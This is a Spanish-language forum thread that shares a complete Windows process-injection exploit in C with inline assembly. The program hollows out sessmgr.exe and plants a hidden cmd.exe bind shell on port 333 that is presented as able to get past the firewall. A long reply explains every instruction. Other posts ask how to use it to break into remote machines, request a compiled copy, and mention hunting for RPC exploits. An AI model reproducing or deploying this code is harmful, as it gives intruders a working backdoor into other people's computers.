Hola a todos:
recientemente navegando por securityfocus encontré este exploit, a ver que les parece.No se si funciona tal y como dice el autor porque la verdad no e podido compilarlo bien, creo que mi compilador de C no esta bien...si alguien lo puede compilar bien que me lo diga por favor;-).En teoria este exploit abre el puerto 333 y el firewall ni se entera y permite a programas que por ejemplo escuchen en este puerto(un backdoor seria ideal) se pueden comunicar con el atacante sin problemas.(el autor es americanidiot).Les dejo el link del sercurityfocus: http://www.securityfocus.com/archive/1/378508

Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}

Un saludo,espero k sirva!!

Estoy utilizando GCC pero no se si es lo correcto :
Sirdarckcat :crees que hay alguna forma de ejecutar este exploit en alguna maquina remotamente?es decir utilizar este exploit para invadir una maquina?Bueno un salduo!PD: si puedes compilarlo avisame ok?un saludooo y gracias por confirmarme que funciona:-)

Pero de alguna manera se puede utilizar remotamente para entrar en la maquina remotamente.¿?

Hola,serias tan amables de colgarlo compilado?

muchisimas gracias.

Bueno, empiezo por explicar el shellcode en asm. (injcode())
esto realmente llama a:
que lo que hace es meter la dirección de la pila en EAX, y despues meterlo en la variable code

metemos en la pila (como es FIFO{First In First Out}, se mete todo al reves), la dirección de el tope de la pila y "ws2_32"

metemos en eax, la dirección 0x11111111, y despues la llamamos.
NOTA: 0x11111111, despues se convierte en la función: "loadlibrarya", por lo que realemnte estamos haciendo que
se cargue en la memoria la libreria "ws2_32" (winsock2_32bits)

hacemos que ebx sea = a 0, al usar la instrucción XOR EBX,EBX.
XOR da 1 cuando los valores son diferentes, como EBX = EBX, regresa 0.
es equivalente a poner MOV EBX,0, pero ocupa menos espacio.
metemos en la pila 0x64 ,y la metemos en ECX

La función wsdata,
metemos EBX en la pila (la primera vez vale 0, recuerdas?)
y se crea un loop hasta que ECX sea igual a 0.
recuerda que ECX vale 64.
en otras palabras esto mete en la pila 64 veces un 0.

esto mete en la pila el valor de ESP, despues mete 101, y llama a 0x33333333 (que es wsastartup)
en otras plabras, llama a la función wsastartup, con 101 en el primer parametro, y la dirección del
principio de la pila en el segundo..
Explico como funciona WSASTARTUP.
&wsaData es un puntero a una estructura que recibe el socket.
VersionRequested, Version Requerida.. es 0x101

Aqui metemos 4 veces 0, despues la constante SOCK_STREAM, seguido de AF_INET.
y llamamos a 0x44444444 (wsasocketa) que sirve para crear el socket.
los valores que le envias son constante que especifican el tipo de conexión y a donde va.
puedes encontrar info sobre esto aqui: http://msdn.microsoft.com/library/en-us/winsock/winsock/wsasocket_2.asp
Info de AF_INET: http://www.xav.com/perl/lib/IO/Socket/INET.html

metemos en ESI el valor de EAX, metemos 3 veces 0, y 0x4D010002 (especifica el puerto 333)
metemos en eax el valor de ESP, metemos 0x10, metemos el valor de EAX (=ESP),
despues ESI(=WSASOCKETA)
y llamamos a _BIND (0x5555555),
bind funciona asi:

metemos en la pila la constante SOMAXCONN (SOcket MAX CONNections)
y el valor de ESI(WSASOCKETA)
y llamamos a la funcion en 0x66666666 (listen), que deja a la escucha.

metemos 2 veces 0, el valor de WSASOCKETA y llamamos a accept, para que.. acepte conexiones xD

Ahora un poco mas lento.
metemos en EDI el valor de EAX (0x77777777)
metemos 4 veces 0.

metemos en EAX el valor de ESP, y 3 veces 0x77777777, seguido de un 0.
metemos SW_HIDE (constante que especifica el valor de proceso en background)
metemos STARTF_USESTDHANDLES (Iniciamos usando Handles)
metemos 0xA (A = 10), para despues sacarlo en POP ECX, y hacer que ECX valga 10

metemos 10 veces 0.
metemos 44.
ponemos en ECX el valor de ESP.
metemos "CMD"
y en EDX el valor de la pila.
esto sirve para delimitar donde esta escrito "CMD" empieza en ECX y acaba en EDX (o es alreves?)

metemos en la pila EAX,(=ESP, 2 secciones arriba)
metemos ECX (=ESP, sección anterior)  QUE DELIMITAN
metemos 3*EBX,1,2*EBX,EDX,EBX (=ESP, sección anterior)
donde dice "CMD", (es el programa que se manda ejecutar).

y llamamos a la funcion 0x22222222 (create process, que recibe todos los parametros.)

ah si, y ponemos a dormir a la computadora hasta infinito. xD

La función over, que se usó al principio, alguien sabe porque esta aqui?

---

---

Bueno, ahora otras secciones del código.
metemos ahí, las direcciones de las debidas funciones.

y le damos una ayuda al shellcode, para que identifique donde estan las funciones.
la funcion setfp es esta:
buffer es lo que vamos a meter despues..
fp es la dirección real de la funcion, from es la que vamos a asignar, sz es 160 (A0h)

---

---

Ahora vamos por main()


veamos..
como vemos, sessmgr vale M_P+13
y aca le asignamos..
solo hasta M_P.
despues metemos un 0 (fin de cadena).
y agregamos \\sessmgr.exe en otras palabras, diremos que se ejecute sinfo, sin hacerlo realmente xD.
Establecemos memoria para sinfo.. que se usa cuando creas el proceso.
Creamos el proceso, si falla, cerramos.
Establecemos control sobre todo el contexto.
Obtenemos el de el proceso que inicializamos con sessmgr
Buscamos el inicio de la tarea del proceso
tib sera true si:
existe sel.BaseLow y es diferente a 0
o si..
sel.HighWord.Bytes.BaseMid es menor que 16
o si..
sel.HighWord.Bytes.BaseHi es menor que 24

Despues leemos la memoria del proceso, que recien inicializamos.. asi
y despues lo mismo, pero con los valores que habiamos recibido anteriormente.

ReadProcessMemory funciona asi:

• Recibe un Handle con la propiedad hProcess de el Processinfo
• Recibe un puntero a la dirección de la base de el Proceso.
• Recibe un puntero donde escribir el contenido de la direccion especificada
• Recibe la cantidad de bytes a leer
• Y un puntero a una varable donde se escriben la cantidad de bytes leidos (opcional)

Metemos en len la longitud, y en buffer el codigo a injectar.
Permitimos escribir en la memoria del proceso..
Y escribimos en la memoria del proceso nuestro código.

para acabar, Iniciamos el proceso (recuerda que lo iniciamos suspendido)

y tenemos nuestra shellcode

ah que interesante exploit , enserio que el que descubrio esto es el mejor 

Saludos!!

Eres un dios Sirdarck 

Voy a probarlo...

Bájate cualquier compilador y listo.

¿Cuál assembler es el de allí?

**editado por sirdarckcat**

es intel

---

Ok ok. Muchas gracias por la super-explicación!

epe, yo tb probe a compilarlo con cygwin, pero alli no va, debe de ser cosa del ensamblador, yo usé el Microsoft Visual C++ y lo compilo a la perfeccion 

Sirdarckcat, gracias de antemano por el interes que pones en ayudar a gente que no tiene tu gran nivel. Respecto a lo que me dijistes busqué en google sobre RPC, encontre que era (o es) un bug del Xp (Sp0 o Sp1) que usaba por ejemplo el blaster y que permitia ejecutar código de forma remota en un pc, tb leí que usaba algo como el DCOM, que no entendí muy bien de que iba  ;
Pero bueno al caso, busqué un codigo que explicará como crear y utiizar dicho exploit, a lo que posteriormente tras no tener mucho resultado me metí en la pagina de elhacker y compile todo los exploit que allí venian y nada ninguno funciona, jajaja, la semana que viene tengo un tema en la uni hablando sobre el RPC, pero dudo que indiquen como explotarlo.

Gracias por la ayuda, soys los mejores